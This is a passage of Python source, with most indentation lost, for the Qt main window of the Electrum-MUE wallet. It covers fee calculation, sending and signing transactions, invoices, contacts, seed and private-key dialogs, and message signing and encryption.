self.fee_e.setAmount(None)
if not freeze_feerate:
self.feerate_e.setAmount(None)
self.feerounding_icon.setVisible(False)
if isinstance(e, NotEnoughFunds):
self.not_enough_funds = True
elif isinstance(e, NoDynamicFeeEstimates):
try:
tx = make_tx(0)
size = tx.estimated_size()
self.size_e.setAmount(size)
except BaseException:
pass
return
except BaseException:
self.logger.exception('')
return
size = tx.estimated_size()
self.size_e.setAmount(size)
fee = tx.get_fee()
fee = None if self.not_enough_funds else fee
# Displayed fee/fee_rate values are set according to user input.
# Due to rounding or dropping dust in CoinChooser,
# actual fees often differ somewhat.
if freeze_feerate or self.fee_slider.is_active():
displayed_feerate = self.feerate_e.get_amount()
if displayed_feerate is not None:
displayed_feerate = quantize_feerate(displayed_feerate)
else:
# fallback to actual fee
displayed_feerate = quantize_feerate(fee / size) if fee is not None else None
self.feerate_e.setAmount(displayed_feerate)
displayed_fee = round(displayed_feerate * size) if displayed_feerate is not None else None
self.fee_e.setAmount(displayed_fee)
else:
if freeze_fee:
displayed_fee = self.fee_e.get_amount()
else:
# fallback to actual fee if nothing is frozen
displayed_fee = fee
self.fee_e.setAmount(displayed_fee)
displayed_fee = displayed_fee if displayed_fee else 0
displayed_feerate = quantize_feerate(displayed_fee / size) if displayed_fee is not None else None
self.feerate_e.setAmount(displayed_feerate)
# show/hide fee rounding icon
feerounding = (fee - displayed_fee) if fee else 0
self.set_feerounding_text(int(feerounding))
self.feerounding_icon.setToolTip(self.feerounding_text)
self.feerounding_icon.setVisible(abs(feerounding) >= 1)
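        # In "Max" mode the amount field is back-filled from the transaction
        # itself: its total output value minus any extra fee a plugin may add
        # via the 'get_tx_extra_fee' hook.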
if self.max_button.isChecked():
amount = tx.output_value()
__, x_fee_amount = run_hook('get_tx_extra_fee', self.wallet, tx) or (None, 0)
amount_after_all_fees = amount - x_fee_amount
self.amount_e.setAmount(amount_after_all_fees)
def from_list_delete(self, item):
i = self.from_list.indexOfTopLevelItem(item)
self.pay_from.pop(i)
self.redraw_from_list()
self.update_fee()
def from_list_menu(self, position):
item = self.from_list.itemAt(position)
menu = QMenu()
menu.addAction(_("Remove"), lambda: self.from_list_delete(item))
menu.exec_(self.from_list.viewport().mapToGlobal(position))
def set_pay_from(self, coins):
self.pay_from = list(coins)
self.redraw_from_list()
def redraw_from_list(self):
self.from_list.clear()
self.from_label.setHidden(len(self.pay_from) == 0)
self.from_list.setHidden(len(self.pay_from) == 0)
def format(x):
h = x.get('prevout_hash')
return h[0:10] + '...' + h[-10:] + ":%d"%x.get('prevout_n') + u'\t' + "%s"%x.get('address')
for item in self.pay_from:
self.from_list.addTopLevelItem(QTreeWidgetItem( [format(item), self.format_amount(item['value']) ]))
def get_contact_payto(self, key):
_type, label = self.contacts.get(key)
return label + ' <' + key + '>' if _type == 'address' else key
def update_completions(self):
l = [self.get_contact_payto(key) for key in self.contacts.keys()]
self.completions.setStringList(l)
def protected(func):
'''Password request wrapper. The password is passed to the function
as the 'password' named argument. "None" indicates either an
unencrypted wallet, or the user cancelled the password request.
An empty input is passed as the empty string.'''
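        # Illustrative usage (see e.g. show_seed_dialog / do_sign below): the
        # decorated method declares a 'password' parameter but is called without
        # one; this wrapper prompts for it and injects it as a keyword argument.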
def request_password(self, *args, **kwargs):
parent = self.top_level_window()
password = None
while self.wallet.has_keystore_encryption():
password = self.password_dialog(parent=parent)
if password is None:
# User cancelled password input
return
try:
self.wallet.check_password(password)
break
except Exception as e:
self.show_error(str(e), parent=parent)
continue
kwargs['password'] = password
return func(self, *args, **kwargs)
return request_password
def is_send_fee_frozen(self):
return self.fee_e.isVisible() and self.fee_e.isModified() \
and (self.fee_e.text() or self.fee_e.hasFocus())
def is_send_feerate_frozen(self):
return self.feerate_e.isVisible() and self.feerate_e.isModified() \
and (self.feerate_e.text() or self.feerate_e.hasFocus())
def get_send_fee_estimator(self):
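        # Returns either a fixed fee in satoshis (fee field frozen), a callable
        # that maps a transaction size to a fee using the frozen sat/byte rate,
        # or None to let the wallet estimate the fee from the slider/config.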
if self.is_send_fee_frozen():
fee_estimator = self.fee_e.get_amount()
elif self.is_send_feerate_frozen():
amount = self.feerate_e.get_amount() # sat/byte feerate
amount = 0 if amount is None else amount * 1000 # sat/kilobyte feerate
fee_estimator = partial(
simple_config.SimpleConfig.estimate_fee_for_feerate, amount)
else:
fee_estimator = None
return fee_estimator
def read_send_tab(self):
if self.payment_request and self.payment_request.has_expired():
self.show_error(_('Payment request has expired'))
return
label = self.message_e.text()
if self.payment_request:
outputs = self.payment_request.get_outputs()
else:
errors = self.payto_e.get_errors()
if errors:
self.show_warning(_("Invalid Lines found:") + "\n\n" + '\n'.join([ _("Line #") + str(x[0]+1) + ": " + x[1] for x in errors]))
return
outputs = self.payto_e.get_outputs(self.max_button.isChecked())
if self.payto_e.is_alias and self.payto_e.validated is False:
alias = self.payto_e.toPlainText()
msg = _('WARNING: the alias "{}" could not be validated via an additional '
'security check, DNSSEC, and thus may not be correct.').format(alias) + '\n'
msg += _('Do you wish to continue?')
if not self.question(msg):
return
if not outputs:
self.show_error(_('No outputs'))
return
for o in outputs:
if o.address is None:
self.show_error(_('MonetaryUnit Address is None'))
return
if o.type == TYPE_ADDRESS and not bitcoin.is_address(o.address):
self.show_error(_('Invalid MonetaryUnit Address'))
return
if o.value is None:
self.show_error(_('Invalid Amount'))
return
fee_estimator = self.get_send_fee_estimator()
coins = self.get_coins()
return outputs, fee_estimator, label, coins
def do_preview(self):
self.do_send(preview = True)
def do_send(self, preview = False):
if run_hook('abort_send', self):
return
r = self.read_send_tab()
if not r:
return
outputs, fee_estimator, tx_desc, coins = r
try:
is_sweep = bool(self.tx_external_keypairs)
tx = self.wallet.make_unsigned_transaction(
coins, outputs, self.config, fixed_fee=fee_estimator,
is_sweep=is_sweep)
except (NotEnoughFunds, NoDynamicFeeEstimates) as e:
self.show_message(str(e))
return
except InternalAddressCorruption as e:
self.show_error(str(e))
raise
except BaseException as e:
self.logger.exception('')
self.show_message(str(e))
return
amount = tx.output_value() if self.max_button.isChecked() else sum(map(lambda x:x[2], outputs))
fee = tx.get_fee()
use_rbf = self.config.get('use_rbf', True)
if use_rbf:
tx.set_rbf(True)
if fee < self.wallet.relayfee() * tx.estimated_size() / 1000:
self.show_error('\n'.join([
_("This transaction requires a higher fee, or it will not be propagated by your current server"),
_("Try to raise your transaction fee, or use a server with a lower relay fee.")
]))
return
if preview:
self.show_transaction(tx, tx_desc)
return
if not self.network:
self.show_error(_("You can't broadcast a transaction without a live network connection."))
return
# confirmation dialog
msg = [
_("Amount to be sent") + ": " + self.format_amount_and_units(amount),
_("Mining fee") + ": " + self.format_amount_and_units(fee),
]
x_fee = run_hook('get_tx_extra_fee', self.wallet, tx)
if x_fee:
x_fee_address, x_fee_amount = x_fee
msg.append( _("Additional fees") + ": " + self.format_amount_and_units(x_fee_amount) )
confirm_rate = simple_config.FEERATE_WARNING_HIGH_FEE
if fee > confirm_rate * tx.estimated_size() / 1000:
msg.append(_('Warning') + ': ' + _("The fee for this transaction seems unusually high."))
if self.wallet.has_keystore_encryption():
msg.append("")
msg.append(_("Enter your password to proceed"))
password = self.password_dialog('\n'.join(msg))
if not password:
return
else:
msg.append(_('Proceed?'))
password = None
if not self.question('\n'.join(msg)):
return
def sign_done(success):
if success:
if not tx.is_complete():
self.show_transaction(tx)
self.do_clear()
else:
self.broadcast_transaction(tx, tx_desc)
self.sign_tx_with_password(tx, sign_done, password)
@protected
def sign_tx(self, tx, callback, password):
self.sign_tx_with_password(tx, callback, password)
def sign_tx_with_password(self, tx, callback, password):
'''Sign the transaction in a separate thread. When done, calls
the callback with a success code of True or False.
'''
def on_success(result):
callback(True)
def on_failure(exc_info):
self.on_error(exc_info)
callback(False)
on_success = run_hook('tc_sign_wrapper', self.wallet, tx, on_success, on_failure) or on_success
if self.tx_external_keypairs:
# can sign directly
task = partial(Transaction.sign, tx, self.tx_external_keypairs)
else:
task = partial(self.wallet.sign_transaction, tx, password)
msg = _('Signing transaction...')
WaitingDialog(self, msg, task, on_success, on_failure)
def broadcast_transaction(self, tx, tx_desc):
def broadcast_thread():
# non-GUI thread
pr = self.payment_request
if pr and pr.has_expired():
self.payment_request = None
return False, _("Payment request has expired")
status = False
try:
self.network.run_from_another_thread(self.network.broadcast_transaction(tx))
except TxBroadcastError as e:
msg = e.get_message_for_gui()
except BestEffortRequestFailed as e:
msg = repr(e)
else:
status, msg = True, tx.txid()
if pr and status is True:
self.invoices.set_paid(pr, tx.txid())
self.invoices.save()
self.payment_request = None
refund_address = self.wallet.get_receiving_address()
coro = pr.send_payment_and_receive_paymentack(str(tx), refund_address)
fut = asyncio.run_coroutine_threadsafe(coro, self.network.asyncio_loop)
ack_status, ack_msg = fut.result(timeout=20)
self.logger.info(f"Payment ACK: {ack_status}. Ack message: {ack_msg}")
return status, msg
# Capture current TL window; override might be removed on return
parent = self.top_level_window(lambda win: isinstance(win, MessageBoxMixin))
def broadcast_done(result):
# GUI thread
if result:
status, msg = result
if status:
if tx_desc is not None and tx.is_complete():
self.wallet.set_label(tx.txid(), tx_desc)
parent.show_message(_('Payment sent.') + '\n' + msg)
self.invoice_list.update()
self.do_clear()
else:
msg = msg or ''
parent.show_error(msg)
WaitingDialog(self, _('Broadcasting transaction...'),
broadcast_thread, broadcast_done, self.on_error)
def query_choice(self, msg, choices):
# Needed by QtHandler for hardware wallets
dialog = WindowModalDialog(self.top_level_window())
clayout = ChoicesLayout(msg, choices)
vbox = QVBoxLayout(dialog)
vbox.addLayout(clayout.layout())
vbox.addLayout(Buttons(OkButton(dialog)))
if not dialog.exec_():
return None
return clayout.selected_index()
def lock_amount(self, b):
self.amount_e.setFrozen(b)
self.max_button.setEnabled(not b)
def prepare_for_payment_request(self):
self.show_send_tab()
self.payto_e.is_pr = True
for e in [self.payto_e, self.message_e]:
e.setFrozen(True)
self.lock_amount(True)
self.payto_e.setText(_("please wait..."))
return True
def delete_invoice(self, key):
self.invoices.remove(key)
self.invoice_list.update()
def payment_request_ok(self):
pr = self.payment_request
key = self.invoices.add(pr)
status = self.invoices.get_status(key)
self.invoice_list.update()
if status == PR_PAID:
            self.show_message(_("invoice already paid"))
self.do_clear()
self.payment_request = None
return
self.payto_e.is_pr = True
if not pr.has_expired():
self.payto_e.setGreen()
else:
self.payto_e.setExpired()
self.payto_e.setText(pr.get_requestor())
self.amount_e.setText(format_satoshis_plain(pr.get_amount(), self.decimal_point))
self.message_e.setText(pr.get_memo())
# signal to set fee
self.amount_e.textEdited.emit("")
def payment_request_error(self):
self.show_message(self.payment_request.error)
self.payment_request = None
self.do_clear()
def on_pr(self, request):
self.payment_request = request
if self.payment_request.verify(self.contacts):
self.payment_request_ok_signal.emit()
else:
self.payment_request_error_signal.emit()
def pay_to_URI(self, URI):
if not URI:
return
try:
out = util.parse_URI(URI, self.on_pr)
except BaseException as e:
self.show_error(_('Invalid MonetaryUnit URI:') + '\n' + str(e))
return
self.show_send_tab()
r = out.get('r')
sig = out.get('sig')
name = out.get('name')
if r or (name and sig):
self.prepare_for_payment_request()
return
address = out.get('address')
amount = out.get('amount')
label = out.get('label')
message = out.get('message')
# use label as description (not BIP21 compliant)
if label and not message:
message = label
if address:
self.payto_e.setText(address)
if message:
self.message_e.setText(message)
if amount:
self.amount_e.setAmount(amount)
self.amount_e.textEdited.emit("")
def do_clear(self):
self.max_button.setChecked(False)
self.not_enough_funds = False
self.payment_request = None
self.payto_e.is_pr = False
for e in [self.payto_e, self.message_e, self.amount_e, self.fiat_send_e,
self.fee_e, self.feerate_e]:
e.setText('')
e.setFrozen(False)
self.fee_slider.activate()
self.feerate_e.setAmount(self.config.fee_per_byte())
self.size_e.setAmount(0)
self.feerounding_icon.setVisible(False)
self.set_pay_from([])
self.tx_external_keypairs = {}
self.update_status()
run_hook('do_clear', self)
def set_frozen_state_of_addresses(self, addrs, freeze: bool):
self.wallet.set_frozen_state_of_addresses(addrs, freeze)
self.address_list.update()
self.utxo_list.update()
self.update_fee()
def set_frozen_state_of_coins(self, utxos, freeze: bool):
self.wallet.set_frozen_state_of_coins(utxos, freeze)
self.utxo_list.update()
self.update_fee()
def create_list_tab(self, l, toolbar=None):
w = QWidget()
w.searchable_list = l
vbox = QVBoxLayout()
w.setLayout(vbox)
vbox.setContentsMargins(0, 0, 0, 0)
vbox.setSpacing(0)
if toolbar:
vbox.addLayout(toolbar)
vbox.addWidget(l)
return w
def create_addresses_tab(self):
from .address_list import AddressList
self.address_list = l = AddressList(self)
toolbar = l.create_toolbar(self.config)
toolbar_shown = self.config.get('show_toolbar_addresses', False)
l.show_toolbar(toolbar_shown)
return self.create_list_tab(l, toolbar)
def create_utxo_tab(self):
from .utxo_list import UTXOList
self.utxo_list = l = UTXOList(self)
return self.create_list_tab(l)
def create_contacts_tab(self):
from .contact_list import ContactList
self.contact_list = l = ContactList(self)
return self.create_list_tab(l)
def remove_address(self, addr):
if self.question(_("Do you want to remove {} from your wallet?").format(addr)):
self.wallet.delete_address(addr)
self.need_update.set() # history, addresses, coins
self.clear_receive_tab()
def get_coins(self):
if self.pay_from:
return self.pay_from
else:
return self.wallet.get_spendable_coins(None, self.config)
def spend_coins(self, coins):
self.set_pay_from(coins)
self.show_send_tab()
self.update_fee()
def paytomany(self):
self.show_send_tab()
self.payto_e.paytomany()
msg = '\n'.join([
_('Enter a list of outputs in the \'Pay to\' field.'),
_('One output per line.'),
_('Format: address, amount'),
_('You may load a CSV file using the file icon.')
])
self.show_message(msg, title=_('Pay to many'))
def payto_contacts(self, labels):
paytos = [self.get_contact_payto(label) for label in labels]
self.show_send_tab()
if len(paytos) == 1:
self.payto_e.setText(paytos[0])
self.amount_e.setFocus()
else:
text = "\n".join([payto + ", 0" for payto in paytos])
self.payto_e.setText(text)
self.payto_e.setFocus()
def set_contact(self, label, address):
if not is_address(address):
self.show_error(_('Invalid Address'))
self.contact_list.update() # Displays original unchanged value
return False
self.contacts[address] = ('address', label)
self.contact_list.update()
self.history_list.update()
self.update_completions()
return True
def delete_contacts(self, labels):
if not self.question(_("Remove {} from your list of contacts?")
.format(" + ".join(labels))):
return
for label in labels:
self.contacts.pop(label)
self.history_list.update()
self.contact_list.update()
self.update_completions()
def show_invoice(self, key):
pr = self.invoices.get(key)
if pr is None:
self.show_error('Cannot find payment request in wallet.')
return
pr.verify(self.contacts)
self.show_pr_details(pr)
def show_pr_details(self, pr):
key = pr.get_id()
d = WindowModalDialog(self, _("Invoice"))
vbox = QVBoxLayout(d)
grid = QGridLayout()
grid.addWidget(QLabel(_("Requestor") + ':'), 0, 0)
grid.addWidget(QLabel(pr.get_requestor()), 0, 1)
grid.addWidget(QLabel(_("Amount") + ':'), 1, 0)
outputs_str = '\n'.join(map(lambda x: self.format_amount(x[2])+ self.base_unit() + ' @ ' + x[1], pr.get_outputs()))
grid.addWidget(QLabel(outputs_str), 1, 1)
expires = pr.get_expiration_date()
grid.addWidget(QLabel(_("Memo") + ':'), 2, 0)
grid.addWidget(QLabel(pr.get_memo()), 2, 1)
grid.addWidget(QLabel(_("Signature") + ':'), 3, 0)
grid.addWidget(QLabel(pr.get_verify_status()), 3, 1)
if expires:
grid.addWidget(QLabel(_("Expires") + ':'), 4, 0)
grid.addWidget(QLabel(format_time(expires)), 4, 1)
vbox.addLayout(grid)
def do_export():
name = str(key) + '.bip70'
fn = self.getSaveFileName(_("Save invoice to file"), name, filter="*.bip70")
if not fn:
return
            with open(fn, 'wb') as f:
                f.write(pr.raw)
            self.show_message(_('Invoice saved as') + ' ' + fn)
exportButton = EnterButton(_('Save'), do_export)
def do_delete():
if self.question(_('Delete invoice?')):
self.invoices.remove(key)
self.history_list.update()
self.invoice_list.update()
d.close()
deleteButton = EnterButton(_('Delete'), do_delete)
vbox.addLayout(Buttons(exportButton, deleteButton, CloseButton(d)))
d.exec_()
def do_pay_invoice(self, key):
pr = self.invoices.get(key)
self.payment_request = pr
self.prepare_for_payment_request()
pr.error = None # this forces verify() to re-run
if pr.verify(self.contacts):
self.payment_request_ok()
else:
self.payment_request_error()
def create_console_tab(self):
from .console import Console
self.console = console = Console()
return console
def update_console(self):
console = self.console
console.history = self.config.get("console-history",[])
console.history_index = len(console.history)
console.updateNamespace({
'wallet': self.wallet,
'network': self.network,
'plugins': self.gui_object.plugins,
'window': self,
'config': self.config,
'electrum': electrum,
'daemon': self.gui_object.daemon,
'util': util,
'bitcoin': bitcoin,
})
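        # Expose every CLI command from commands.Commands in the console as a
        # plain function; private members and names that would shadow the
        # objects above (network/wallet/config) are skipped.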
c = commands.Commands(self.config, self.wallet, self.network, lambda: self.console.set_json(True))
methods = {}
def mkfunc(f, method):
return lambda *args: f(method, args, self.password_dialog)
for m in dir(c):
if m[0]=='_' or m in ['network','wallet','config']: continue
methods[m] = mkfunc(c._run, m)
console.updateNamespace(methods)
def create_status_bar(self):
sb = QStatusBar()
sb.setFixedHeight(35)
self.balance_label = QLabel("Loading wallet...")
self.balance_label.setTextInteractionFlags(Qt.TextSelectableByMouse)
self.balance_label.setStyleSheet("""QLabel { padding: 0 }""")
sb.addWidget(self.balance_label)
self.search_box = QLineEdit()
self.search_box.textChanged.connect(self.do_search)
self.search_box.hide()
sb.addPermanentWidget(self.search_box)
self.update_check_button = QPushButton("")
self.update_check_button.setFlat(True)
self.update_check_button.setCursor(QCursor(Qt.PointingHandCursor))
self.update_check_button.setIcon(read_QIcon("update.png"))
self.update_check_button.hide()
sb.addPermanentWidget(self.update_check_button)
self.password_button = StatusBarButton(QIcon(), _("Password"), self.change_password_dialog )
sb.addPermanentWidget(self.password_button)
sb.addPermanentWidget(StatusBarButton(read_QIcon("preferences.png"), _("Preferences"), self.settings_dialog ) )
self.seed_button = StatusBarButton(read_QIcon("seed.png"), _("Seed"), self.show_seed_dialog )
sb.addPermanentWidget(self.seed_button)
self.status_button = StatusBarButton(read_QIcon("status_disconnected.png"), _("Network"), lambda: self.gui_object.show_network_dialog(self))
sb.addPermanentWidget(self.status_button)
run_hook('create_status_bar', sb)
self.setStatusBar(sb)
def update_lock_icon(self):
icon = read_QIcon("lock.png") if self.wallet.has_password() else read_QIcon("unlock.png")
self.password_button.setIcon(icon)
def update_buttons_on_seed(self):
self.seed_button.setVisible(self.wallet.has_seed())
self.password_button.setVisible(self.wallet.may_have_password())
self.send_button.setVisible(not self.wallet.is_watching_only())
def change_password_dialog(self):
from electrum_mue.storage import STO_EV_XPUB_PW
if self.wallet.get_available_storage_encryption_version() == STO_EV_XPUB_PW:
from .password_dialog import ChangePasswordDialogForHW
d = ChangePasswordDialogForHW(self, self.wallet)
ok, encrypt_file = d.run()
if not ok:
return
try:
hw_dev_pw = self.wallet.keystore.get_password_for_storage_encryption()
except UserCancelled:
return
except BaseException as e:
self.logger.exception('')
self.show_error(str(e))
return
old_password = hw_dev_pw if self.wallet.has_password() else None
new_password = hw_dev_pw if encrypt_file else None
else:
from .password_dialog import ChangePasswordDialogForSW
d = ChangePasswordDialogForSW(self, self.wallet)
ok, old_password, new_password, encrypt_file = d.run()
if not ok:
return
try:
self.wallet.update_password(old_password, new_password, encrypt_file)
except InvalidPassword as e:
self.show_error(str(e))
return
except BaseException:
self.logger.exception('Failed to update password')
self.show_error(_('Failed to update password'))
return
msg = _('Password was updated successfully') if self.wallet.has_password() else _('Password is disabled, this wallet is not protected')
self.show_message(msg, title=_("Success"))
self.update_lock_icon()
def toggle_search(self):
tab = self.tabs.currentWidget()
#if hasattr(tab, 'searchable_list'):
# tab.searchable_list.toggle_toolbar()
#return
self.search_box.setHidden(not self.search_box.isHidden())
if not self.search_box.isHidden():
self.search_box.setFocus(1)
else:
self.do_search('')
def do_search(self, t):
tab = self.tabs.currentWidget()
if hasattr(tab, 'searchable_list'):
tab.searchable_list.filter(t)
def new_contact_dialog(self):
d = WindowModalDialog(self, _("New Contact"))
vbox = QVBoxLayout(d)
vbox.addWidget(QLabel(_('New Contact') + ':'))
grid = QGridLayout()
line1 = QLineEdit()
line1.setFixedWidth(280)
line2 = QLineEdit()
line2.setFixedWidth(280)
grid.addWidget(QLabel(_("Address")), 1, 0)
grid.addWidget(line1, 1, 1)
grid.addWidget(QLabel(_("Name")), 2, 0)
grid.addWidget(line2, 2, 1)
vbox.addLayout(grid)
vbox.addLayout(Buttons(CancelButton(d), OkButton(d)))
if d.exec_():
self.set_contact(line2.text(), line1.text())
def show_master_public_keys(self):
dialog = WindowModalDialog(self, _("Wallet Information"))
dialog.setMinimumSize(500, 100)
mpk_list = self.wallet.get_master_public_keys()
vbox = QVBoxLayout()
wallet_type = self.wallet.storage.get('wallet_type', '')
if self.wallet.is_watching_only():
wallet_type += ' [{}]'.format(_('watching-only'))
seed_available = _('True') if self.wallet.has_seed() else _('False')
keystore_types = [k.get_type_text() for k in self.wallet.get_keystores()]
grid = QGridLayout()
basename = os.path.basename(self.wallet.storage.path)
grid.addWidget(QLabel(_("Wallet name")+ ':'), 0, 0)
grid.addWidget(QLabel(basename), 0, 1)
grid.addWidget(QLabel(_("Wallet type")+ ':'), 1, 0)
grid.addWidget(QLabel(wallet_type), 1, 1)
grid.addWidget(QLabel(_("Script type")+ ':'), 2, 0)
grid.addWidget(QLabel(self.wallet.txin_type), 2, 1)
grid.addWidget(QLabel(_("Seed available") + ':'), 3, 0)
grid.addWidget(QLabel(str(seed_available)), 3, 1)
if len(keystore_types) <= 1:
grid.addWidget(QLabel(_("Keystore type") + ':'), 4, 0)
ks_type = str(keystore_types[0]) if keystore_types else _('No keystore')
grid.addWidget(QLabel(ks_type), 4, 1)
vbox.addLayout(grid)
if self.wallet.is_deterministic():
mpk_text = ShowQRTextEdit()
mpk_text.setMaximumHeight(150)
mpk_text.addCopyButton(self.app)
def show_mpk(index):
mpk_text.setText(mpk_list[index])
# only show the combobox in case multiple accounts are available
if len(mpk_list) > 1:
def label(key):
if isinstance(self.wallet, Multisig_Wallet):
return _("cosigner") + f' {key+1} ( keystore: {keystore_types[key]} )'
return ''
labels = [label(i) for i in range(len(mpk_list))]
on_click = lambda clayout: show_mpk(clayout.selected_index())
labels_clayout = ChoicesLayout(_("Master Public Keys"), labels, on_click)
vbox.addLayout(labels_clayout.layout())
else:
vbox.addWidget(QLabel(_("Master Public Key")))
show_mpk(0)
vbox.addWidget(mpk_text)
vbox.addStretch(1)
vbox.addLayout(Buttons(CloseButton(dialog)))
dialog.setLayout(vbox)
dialog.exec_()
def remove_wallet(self):
if self.question('\n'.join([
_('Delete wallet file?'),
"%s"%self.wallet.storage.path,
_('If your wallet contains funds, make sure you have saved its seed.')])):
self._delete_wallet()
@protected
def _delete_wallet(self, password):
wallet_path = self.wallet.storage.path
basename = os.path.basename(wallet_path)
r = self.gui_object.daemon.delete_wallet(wallet_path)
self.close()
if r:
self.show_error(_("Wallet removed: {}").format(basename))
else:
self.show_error(_("Wallet file not found: {}").format(basename))
@protected
def show_seed_dialog(self, password):
if not self.wallet.has_seed():
self.show_message(_('This wallet has no seed'))
return
keystore = self.wallet.get_keystore()
try:
seed = keystore.get_seed(password)
passphrase = keystore.get_passphrase(password)
except BaseException as e:
self.show_error(str(e))
return
from .seed_dialog import SeedDialog
d = SeedDialog(self, seed, passphrase)
d.exec_()
def show_qrcode(self, data, title = _("QR code"), parent=None):
if not data:
return
d = QRDialog(data, parent or self, title)
d.exec_()
@protected
def show_private_key(self, address, password):
if not address:
return
try:
pk, redeem_script = self.wallet.export_private_key(address, password)
except Exception as e:
self.logger.exception('')
self.show_message(str(e))
return
xtype = bitcoin.deserialize_privkey(pk)[0]
d = WindowModalDialog(self, _("Private key"))
d.setMinimumSize(600, 150)
vbox = QVBoxLayout()
vbox.addWidget(QLabel(_("Address") + ': ' + address))
vbox.addWidget(QLabel(_("Script type") + ': ' + xtype))
vbox.addWidget(QLabel(_("Private key") + ':'))
keys_e = ShowQRTextEdit(text=pk)
keys_e.addCopyButton(self.app)
vbox.addWidget(keys_e)
if redeem_script:
vbox.addWidget(QLabel(_("Redeem Script") + ':'))
rds_e = ShowQRTextEdit(text=redeem_script)
rds_e.addCopyButton(self.app)
vbox.addWidget(rds_e)
vbox.addLayout(Buttons(CloseButton(d)))
d.setLayout(vbox)
d.exec_()
msg_sign = _("Signing with an address actually means signing with the corresponding "
"private key, and verifying with the corresponding public key. The "
"address you have entered does not have a unique public key, so these "
"operations cannot be performed.") + '\n\n' + \
_('The operation is undefined. Not just in Electrum-MUE, but in general.')
@protected
def do_sign(self, address, message, signature, password):
address = address.text().strip()
message = message.toPlainText().strip()
if not bitcoin.is_address(address):
self.show_message(_('Invalid MonetaryUnit address.'))
return
if self.wallet.is_watching_only():
self.show_message(_('This is a watching-only wallet.'))
return
if not self.wallet.is_mine(address):
self.show_message(_('Address not in wallet.'))
return
txin_type = self.wallet.get_txin_type(address)
if txin_type not in ['p2pkh', 'p2wpkh', 'p2wpkh-p2sh']:
self.show_message(_('Cannot sign messages with this type of address:') + \
' ' + txin_type + '\n\n' + self.msg_sign)
return
task = partial(self.wallet.sign_message, address, message, password)
def show_signed_message(sig):
try:
signature.setText(base64.b64encode(sig).decode('ascii'))
except RuntimeError:
# (signature) wrapped C/C++ object has been deleted
pass
self.wallet.thread.add(task, on_success=show_signed_message)
def do_verify(self, address, message, signature):
address = address.text().strip()
message = message.toPlainText().strip().encode('utf-8')
if not bitcoin.is_address(address):
self.show_message(_('Invalid MonetaryUnit address.'))
return
try:
# This can throw on invalid base64
sig = base64.b64decode(str(signature.toPlainText()))
verified = ecc.verify_message_with_address(address, sig, message)
except Exception as e:
verified = False
if verified:
self.show_message(_("Signature verified"))
else:
self.show_error(_("Wrong signature"))
def sign_verify_message(self, address=''):
d = WindowModalDialog(self, _('Sign/verify Message'))
d.setMinimumSize(610, 290)
layout = QGridLayout(d)
message_e = QTextEdit()
message_e.setAcceptRichText(False)
layout.addWidget(QLabel(_('Message')), 1, 0)
layout.addWidget(message_e, 1, 1)
layout.setRowStretch(2,3)
address_e = QLineEdit()
address_e.setText(address)
layout.addWidget(QLabel(_('Address')), 2, 0)
layout.addWidget(address_e, 2, 1)
signature_e = QTextEdit()
signature_e.setAcceptRichText(False)
layout.addWidget(QLabel(_('Signature')), 3, 0)
layout.addWidget(signature_e, 3, 1)
layout.setRowStretch(3,1)
hbox = QHBoxLayout()
b = QPushButton(_("Sign"))
b.clicked.connect(lambda: self.do_sign(address_e, message_e, signature_e))
hbox.addWidget(b)
b = QPushButton(_("Verify"))
b.clicked.connect(lambda: self.do_verify(address_e, message_e, signature_e))
hbox.addWidget(b)
b = QPushButton(_("Close"))
b.clicked.connect(d.accept)
hbox.addWidget(b)
layout.addLayout(hbox, 4, 1)
d.exec_()
@protected
def do_decrypt(self, message_e, pubkey_e, encrypted_e, password):
if self.wallet.is_watching_only():
self.show_message(_('This is a watching-only wallet.'))
return
cyphertext = encrypted_e.toPlainText()
task = partial(self.wallet.decrypt_message, pubkey_e.text(), cyphertext, password)
def setText(text):
try:
message_e.setText(text.decode('utf-8'))
except RuntimeError:
# (message_e) wrapped C/C++ object has been deleted
pass
self.wallet.thread.add(task, on_success=setText)
def do_encrypt(self, message_e, pubkey_e, encrypted_e):
message = message_e.toPlainText()
message = message.encode('utf-8')
try:
public_key = ecc.ECPubkey(bfh(pubkey_e.text()))
except BaseException as e:
self.logger.exception('Invalid Public key')
self.show_warning(_('Invalid Public key'))
return
encrypted = public_key.encrypt_message(message)
encrypted_e.setText(encrypted.decode('ascii'))
def encrypt_message(self, address=''):
d = WindowModalDialog(self, _('Encrypt/decrypt Message'))
d.setMinimumSize(610, 490)
layout = QGridLayout(d)
message_e = QTextEdit()
message_e.setAcceptRichText(False)
layout.addWidget(QLabel(_('Message')), 1, 0)
layout.addWidget(message_e, 1, 1)
layout.setRowStretch(2,3)
pubkey_e = QLineEdit()
if address:
pubkey = self.wallet.get_public_key(address)
pubkey_e.setText(pubkey)
layout.addWidget(QLabel(_('Public key')), 2, 0)
layout.addWidget(pubkey_e, 2, 1)
encrypted_e = QTextEdit()
encrypted_e.setAcceptRichText(False)
layout.addWidget(QLabel(_('Encrypted')), 3, 0)
layout.addWidget(encrypted_e, 3, 1)
layout.setRowStretch(3,1)
hbox = QHBoxLayout()
b = QPushButton(_("Encrypt"))
b.clicked.connect(lambda: self.do_encrypt(message_e, pubkey_e, encrypted_e))
hbox.addWidget(b)
b = QPushButton(_("Decrypt"))
b.clicked.connect(lambda: self.do_decrypt(message_e, pubkey_e, encrypted_e))
hbox.addWidget(b)
b = QPushButton(_("Close"))
b.clicked.connect(d.accept)
hbox.addWidget(b)
layout.addLayout(hbox, 4, 1)
d.exec_()
def password_dialog(self, msg=None, parent=None):
from .password_dialog import PasswordDialog
parent = parent or self
d = PasswordDialog(parent, msg)
return d.run()
def tx_from_text(self, txt):
from electrum_mue.transaction import tx_from_str
try:
tx = tx_from_str(txt)
return Transaction(tx)
except BaseException as e:
self.show_critical(_("Electrum-MUE was unable to parse your transaction") + ":\n" + str(e))
return
def read_tx_from_qrcode(self):
from electrum_mue import qrscanner
try:
data = qrscanner.scan_barcode(self.config.get_video_device())
except BaseException as e:
self.show_error(str(e))
return
if not data:
return
# if the user scanned a bitcoin URI
if str(data).startswith("monetaryunit:"):
self.pay_to_URI(data)
return
# else if the user scanned an offline signed tx
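        # Raw transactions are QR-encoded in base43 (presumably to fit the QR
        # alphanumeric mode), so decode that back to hex before parsing.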
try:
data = bh2u(bitcoin.base_decode(data, length=None, base=43))
except BaseException as e:
self.show_error((_('Could not decode QR code')+':\n{}').format(repr(e)))
return
tx = self.tx_from_text(data)
if not tx:
return
self.show_transaction(tx)
def read_tx_from_file(self):
fileName = self.getOpenFileName(_("Select your transaction file"), "*.txn")
if not fileName:
return
try:
with open(fileName, "r") as f:
file_content = f.read()
